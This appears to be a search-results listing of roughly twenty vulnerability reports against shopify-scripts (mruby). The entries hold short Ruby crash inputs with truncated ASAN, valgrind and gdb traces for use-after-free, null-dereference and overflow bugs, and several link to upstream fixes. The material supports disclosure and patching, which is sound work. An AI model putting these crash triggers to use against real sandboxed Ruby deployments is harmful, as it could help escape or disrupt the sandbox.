52 matches found
shopify-scripts: Invalid read in `str_replace_partial`
PoC === The attached POC shows an invalid read. Debug info ========== The issue happens when memmove is called inside strreplacepartial. valgrind report: 0==27051== Invalid read of size 1 ==27051== at 0x483FA10: memmove vgreplacestrmem.c:1270 ==27051== by 0x135D60: strreplacepartial string.c:1193...
shopify-scripts: NULL pointer dereference in `mrb_check_frozen`
PoC === The following demonstrates a crash: 3735928559.removeinstancevariable '@a' Debug info ========== Valgrind suggests the crash happens due to an invalid read in mrbcheckfrozen: ==4882== Memcheck, a memory error detector ==4882== Copyright C 2002-2017, and GNU GPL'd, by Julian Seward et al...
shopify-scripts: SEGV on ary_concat
The following input demonstrates a crash: def z return begin 0.each do return end rescue = x ensure x.backtrace end end z ASAN report ./mruby/bin/mruby asd.rb ASAN:DEADLYSIGNAL ================================================================= ==43761==ERROR: AddressSanitizer: SEGV on unknown...
shopify-scripts: Invalid read leading to a segfault
PoC === The attached POC demonstrates invalid reads leading to a segfault. Debug info ========== gdb report: 423│ dispatchlinkedcodegenscope s, int pc 424│ 425│ mrbcode i; 426│ int pos; 427│ 428│ if !pc return; 429│ for ;; 430├─── i = s-iseqpc; gdb p pc $1 = -32730 valgrind report: ==21952==...
shopify-scripts: heap-use-after-free in OP_RESCUE
The following input demonstrates a crash: def e proc ensure z rescue yield end e Class def x new Class 0 ensure 0 = 00end rescue 0 rescue z ASAN report ./mruby/bin/mruby out.rb ================================================================= ==10040==ERROR: AddressSanitizer: heap-use-after-free ...
shopify-scripts: Heap Overflow in fiber_switch triggered from Fiber.transfer
It appears as if my recommendations were ignored in the GitHub issue, so I've repeated the issue here. PoC Fiber.new.transfer 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0 Explanation The cause of this is th...
shopify-scripts: heap-use-after-free in mrb_vm_exec - vm.c:1247
Following input causes a heap-use-after-free in mrbvmexec vm.c:1247: g=0.times.p a %w0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ...
shopify-scripts: heap use after free in fiber_switch
@ssarong reported an input that triggers a heap use-after-free: https://github.com/mruby/mruby/issues/3619 The issue was addressed upstream in https://github.com/mruby/mruby/commit/15fba69710c7395b4e9523edb191ef84f672fa28...
shopify-scripts: Null pointer dereferences in kh_copy_mt
@ssarong reported an input that triggers a null pointer dereference: https://github.com/mruby/mruby/pull/3615 The issue was addressed in https://github.com/mruby/mruby/commit/de969942338ac440294eefb2e7846a6975f4efdd...
shopify-scripts: Invalid Pointer reference in L_RESCUE
@ssarong reported an input that triggers an out-of-bounds read: https://github.com/mruby/mruby/issues/3603 This issue was addressed upstream in https://github.com/mruby/mruby/commit/761493934e19d1a6edea53e9fbdb39eb78ef898e...
shopify-scripts: heap use-after-free in mrb_vm_exec()
The code bellow triggers a heap use-after-free vulnerability: class M def M.newr super new0 end end M.new0 ASAN report : ================================================================= ==25617==ERROR: AddressSanitizer: heap-use-after-free on address 0xf4103e50 at pc 0x080f7231 bp 0xffc69ab8 sp...
shopify-scripts: Crash in ary_concat()
The code above raises a segmentation fault both in mruby and mruby-engine N case when nil -do end def eend end ASAN report : line 1:3: '' interpreted as argument prefix ASAN:SIGSEGV ================================================================= ==111090==ERROR: AddressSanitizer: SEGV on unknow...
shopify-scripts: Null pointer dereferences in mrb_get_args
@ssarong reported a null pointer dereference in MRuby: https://github.com/mruby/mruby/issues/3559 The issue was corrected in https://github.com/mruby/mruby/commit/dcbfe7162586eb46e583cb140f4f6cde7ae2b87a...
shopify-scripts: SIGABRT in mrb_debug_info_append_file
PoC ------------------- The following code triggers the bug attached as testmrbdebuginfoappendfile.rb: i""do"".+end mirb ------------------- x@x:/Desktop/test/mruby/bin$ ./mirb testmrbdebuginfoappendfile.rb mirb - Embeddable Interactive Ruby Shell mirb: /home/x/Desktop/test/mruby/src/debug.c:136:...
shopify-scripts: Null pointer dereference in mrb_class
PoC === The following demonstrates a crash: if def class A ensure e rescue 0 end end .map.a Debug info ========== The crash happens due to a null pointer dereference in mrbclass, class.h:50. 50├ return mrbobjptrv-c; Valgrind shows several reads inside free'd blocks. Test platform =============...
shopify-scripts: SIGSEGV in mrb_class
PoC ------------------- Attached as testmrbclass.rb: Debug - mirb ------------------- Program received signal SIGSEGV, Segmentation fault. 0x0000000000402ef2 in mrbclass mrb=0x6b0010, v=... at /home/x/Desktop/test/mruby/include/mruby/class.h:50 50 return mrbobjptrv-c; gdb l 45 case MRBTTCPTR: 46...
shopify-scripts: SIGSEGV in mrb_vm_exec
PoC ------------------- The following code triggers the bug attached as testmrbvmexec.rb: s=proc|f,g,x|fxgx.curry k=proc|x,y|x.curry i=proc|x|x.curry fi0= re0=proc|x|fi0.size;x.curry ssiiki0sskssksssksskskre0skskkksksk Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb...
shopify-scripts: SIGABRT - mirb - Double Free
PoC ------------------- Attached as test.rb Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb r Reading symbols from ./mirb...done. gdb r test.rb Starting program: /home/x/Desktop/test/mruby/bin/mirb test.rb mirb - Embeddable Interactive Ruby Shell NoMethodError: undefin...
shopify-scripts: Null pointer dereferences in ary_concat
@ssarong reported a null pointer dereference in MRuby: https://github.com/mruby/mruby/issues/3532 The issue was corrected in https://github.com/mruby/mruby/commit/d35fcf1ea2bfc3933b2f2543265874669feeee95...
shopify-scripts: SIGABRT - mirb and mruby
PoC ------------------- The following code triggers the bug attached as test.rb: def methodmissingm,e self.ff||=00end e Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb Reading symbols from ./mirb...done. gdb r test.rb Starting program: /home/x/Desktop/test/mruby/bin/mi...